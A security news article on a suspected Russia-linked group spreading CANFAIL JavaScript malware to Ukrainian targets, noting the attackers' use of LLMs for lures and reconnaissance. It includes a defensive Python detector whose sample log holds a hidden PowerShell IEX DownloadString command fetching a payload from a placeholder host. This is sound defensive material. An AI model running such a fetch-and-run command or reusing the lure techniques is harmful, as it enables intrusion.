Suspected Russian hackers deploy CANFAIL malware against Ukraine

Pierluigi Paganini February 14, 2026

A newly identified, allegedly Russia-linked APT group has targeted Ukrainian defense, government, and energy organizations with CANFAIL malware.

Google Threat Intelligence Group (GTIG) identified a previously undocumented threat actor behind attacks on Ukrainian organizations using CANFAIL malware. The group is possibly linked to Russian intelligence services and has targeted defense, military, government, and energy entities at both the regional and national level in Ukraine.

GTIG researchers observed the suspected Russian-intelligence-linked actor conducting phishing campaigns to deliver CANFAIL malware. The actor is also interested in aerospace and drone-related manufacturers, nuclear research, and humanitarian groups tied to Ukraine. Google reported that the group has also probed Romanian and Moldovan entities.

“GTIG has recently discovered a threat group suspected to be linked to Russian intelligence services which conducts phishing operations to deliver CANFAIL malware primarily against Ukrainian organizations.” reads the report published by Google. “Despite being less sophisticated and resourced than other Russian threat groups, this actor recently began to overcome some technical limitations using LLMs. Through prompting, they conduct reconnaissance, create lures for social engineering, and seek answers to basic technical questions for post-compromise activity and C2 infrastructure setup.”

Though less advanced than other Russian groups, the actor uses LLMs to craft lures, perform reconnaissance, and answer basic technical questions about post-compromise tooling and C2 setup. According to GTIG's analysis, the phishing emails themselves appear to be LLM-generated.

Messages include Google Drive links hosting a RAR archive that contains the CANFAIL malware, often disguised with a double extension such as .pdf.js. Because Windows Explorer hides known file extensions by default, a file named report.pdf.js is displayed as report.pdf, while double-clicking it runs the script through Windows Script Host (wscript.exe). CANFAIL is obfuscated JavaScript that launches a PowerShell script to download and execute a second-stage payload, typically a memory-only PowerShell dropper, while showing the victim a fake error popup so the failure to open a document looks plausible. Changing the default handler for .js/.jse files to a text editor, or blocking wscript.exe and cscript.exe for ordinary users via AppLocker or WDAC, breaks this chain at the first step.

“Phishing emails sent by the actor contain a lure that based on analysis appears to be LLM-generated, uses formal language and a specific official template, and Google Drive links which host a RAR archive containing CANFAIL malware, often disguised with a .pdf.js double extension.” continues the report. “CANFAIL is obfuscated JavaScript which executes a PowerShell script to download and execute an additional stage, most commonly a memory-only PowerShell dropper. It additionally displays a fake “error” popup to the victim.”
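The execution chain described in the two paragraphs above (a double-extension .pdf.js file opened by Windows Script Host, which then spawns PowerShell to fetch and run a second stage in memory) leaves a recognizable trace in process-creation telemetry. The following Python is an added example, not code from the article, from GTIG, or a published CANFAIL rule: it runs three simple rules over four constructed log lines written in a simplified JSON shape loosely modelled on Sysmon Event ID 1 fields. The file names, user name and the host example.invalid are placeholders chosen for the example.

```python
"""Detect a script-host -> PowerShell download cradle, as used by .pdf.js droppers.

Added illustration, not the article's or GTIG's code. The log lines are
constructed for this example; the field names (Image, ParentImage,
CommandLine) mimic Sysmon Event ID 1 but the JSON layout is invented.
"""
import json
import re
from dataclasses import dataclass
from typing import List, Tuple

# Windows Script Host binaries that run a double-clicked .js/.jse/.vbs file.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Child processes a JavaScript dropper typically launches to go further.
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}

# A document-looking extension immediately followed by a script extension.
DOUBLE_EXT_RE = re.compile(
    r"\.(pdf|docx?|xlsx?|pptx?|txt|jpe?g|png)\.(js|jse|vbs|wsf|hta)\b",
    re.IGNORECASE,
)

# Common PowerShell download / in-memory execution indicators.
CRADLE_RE = re.compile(
    r"(DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|\bwget\b|\bcurl\b|"
    r"Invoke-Expression|\biex\b|-enc(odedcommand)?\b|FromBase64String|"
    r"-w(indowstyle)?\s+hidden|\b-nop\b|bypass)",
    re.IGNORECASE,
)


@dataclass
class ProcEvent:
    image: str          # basename of the started process, lower-cased
    parent_image: str   # basename of the parent process, lower-cased
    command_line: str


def parse_event(line: str) -> ProcEvent:
    """Parse one JSON log line (constructed format) into a ProcEvent."""
    d = json.loads(line)
    return ProcEvent(
        image=d["Image"].rsplit("\\", 1)[-1].lower(),
        parent_image=d["ParentImage"].rsplit("\\", 1)[-1].lower(),
        command_line=d["CommandLine"],
    )


def score_event(ev: ProcEvent) -> List[str]:
    """Return every detection reason that fires for a single event."""
    reasons = []
    if ev.parent_image in SCRIPT_HOSTS and ev.image in SHELLS:
        reasons.append(f"script host {ev.parent_image} spawned {ev.image}")
    if ev.image in SCRIPT_HOSTS and DOUBLE_EXT_RE.search(ev.command_line):
        reasons.append("double-extension script launched by script host")
    if ev.image in {"powershell.exe", "pwsh.exe"} and CRADLE_RE.search(ev.command_line):
        reasons.append("PowerShell download/in-memory execution cradle")
    return reasons


def detect(lines) -> List[Tuple[str, List[str]]]:
    """Run the rules over an iterable of log lines; return (image, reasons) alerts."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        reasons = score_event(ev)
        if reasons:
            alerts.append((ev.image, reasons))
    return alerts


# Constructed sample telemetry: two malicious events followed by two benign ones.
_events = [
    {"Image": r"C:\Windows\System32\wscript.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": '"C:\\Windows\\System32\\wscript.exe" '
                    '"C:\\Users\\user\\Downloads\\Request_2026-02.pdf.js"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": "powershell.exe -nop -w hidden -ep bypass -c "
                    "\"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')\""},
    {"Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": '"C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE" /n "C:\\Users\\user\\Documents\\report.docx"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -Command Get-Date"},
]
SAMPLE_LOG_LINES = [json.dumps(e) for e in _events]

if __name__ == "__main__":
    for image, reasons in detect(SAMPLE_LOG_LINES):
        print(f"ALERT {image}: {'; '.join(reasons)}")
```

The three rules are deliberately independent: the double-extension rule catches the first click, the parent/child rule catches the script host handing off to a shell, and the cradle rule catches the PowerShell stage even when the dropper was launched some other way. In a real environment, administrators who run legitimate PowerShell from cscript logon scripts will trip the parent/child rule, so tune on the parent chain (explorer.exe or an archiver as the grandparent is the interesting case) rather than dropping the rule.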

SentinelLABS and the Digital Security Lab of Ukraine documented related activity in the October 2025 “PhantomCaptcha” campaign, which briefly used ClickFix tactics.

Russian espionage groups continue targeting Ukrainian and Western defense-related organizations using military- and drone-themed lures. Below are some groups observed by Google Threat Intelligence Group:

  • APT44 (Sandworm/FROZENBARENTS), linked to GRU Unit 74455, has sought to extract data from Signal and Telegram, using tools like WAVESIGN and INFAMOUSCHISEL to steal information from Windows and Android devices.
  • TEMP.Vermin, tied to LPR-linked actors, deployed malware such as VERMONSTER and SPECTRUM using aerospace and drone-themed domains.
  • UNC5125 targeted frontline drone units with Google Forms lures and malware like MESSYFORK and GREYBATTLE.
  • UNC5792 and UNC4221 abused Signal and WhatsApp features with fake group invites and phishing pages to hijack accounts and deploy malware including STALECOOKIE and TINYWHALE.
  • UNC5976 ran phishing campaigns with malicious RDP files and drone-themed decoys spoofing global defense firms.
  • UNC6096 used WhatsApp to deliver Windows and Android malware, including GALLGRAB.
  • UNC5114 spread CraxsRAT disguised as a Kropyva app update.

“Russia’s use of cyber operations in support of military objectives in the war against Ukraine and beyond is multifaceted. On a tactical level, targeting has broadened to include individuals in addition to organizations in order to support frontline operations and beyond, likely due at least in part to the reliance on public and off-the-shelf technology rather than custom products.” concludes the report. “Russian threat actors have targeted secure messaging applications used by the Ukrainian military to communicate and orchestrate military operations, including via attempts to exfiltrate locally stored databases of these apps, such as from mobile devices captured during Russia’s ongoing invasion of Ukraine.”


Pierluigi Paganini

(SecurityAffairs – hacking, CANFAIL malware)

Source: https://securityaffairs.com/187976/hacking/suspected-russian-hackers-deploy-canfail-malware-against-ukraine.html